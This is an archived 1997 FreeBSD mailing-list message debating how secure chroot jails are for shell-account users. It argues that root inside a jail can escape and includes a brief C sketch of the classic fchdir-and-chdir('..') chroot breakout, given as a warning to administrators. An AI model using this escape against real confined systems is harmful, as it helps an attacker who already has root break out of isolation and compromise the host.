Date: Thu, 29 May 1997 09:16:10 -0600 From: Warner Losh <imp@village.org> To: Terry Lambert <terry@lambert.org> Cc: dec@phoenix.its.rpi.edu, peter@grendel.IAEhv.nl, mrcpu@cdsnet.net, hackers@freebsd.org Subject: Re: Correct way to chroot for shell account users? Message-ID: <E0wX6vy-0002fp-00@rover.village.org> In-Reply-To: Your message of "Thu, 29 May 1997 07:56:26 PDT." <199705291456.HAA03526@phaeton.artisoft.com> References: <199705291456.HAA03526@phaeton.artisoft.com>
next in thread | previous in thread | raw e-mail | index | archive | help
In message <199705291456.HAA03526@phaeton.artisoft.com> Terry Lambert writes: : 1) namei() refusing to traverse ".." from the chroot'ed : root vnode (this is broken, but then almost all of : namei() is broken, and no one cares but me...). This works because the .. is outside the jail. : 2) The chroot() call takes a path, which namei() will : look up relative Yes. That's true but irrelevant. : 3) The link() system call in /sys/kern/vfs_syscalls.c has : code to prevent hard links on directories: : : if (vp->v_type == VDIR) : error = EPERM; /* POSIX */ : : Not even root can do the hard link your method requires. Right, that's what I said, but this is new. : 4) You don't have to let them have an open fd to the original : "/" when you throw them in jail. Ummm, the "/" I was talking about was the new root (eg /jail in the non-chroot'd system). You open up /, keep that fd around, then chroot to someplace else lower in your current tree (eg /jail/xxx in the non-chrooted case, or /xxx in the chroot'd case). At this point the fchdir would succeed in landing you outside the jail. : 5) Calling chroot(2) is restricted to the superuser anyway, : and only an idiot would try to put a root user in a : chroot jail anyway (or put an ordinary user in a chroot : jail with suid/sgid binaries). 100% correct. However, many people think that a chroot'd environment is so safe that even root can't climb out. It isn't. If somehow a user gets root in a chroot'd environment, then your entire machine can be comporomised. Michael Smith posted the program to climb out of the jail here a few months ago. This isn't theoretical, but it works. It was something along the lines of the following. You can find it in the archives. int main() { int fd; mkdir("xxx"); fd = open("/"); chroot("/xxx"); fchdir(fd); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); }
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?E0wX6vy-0002fp-00>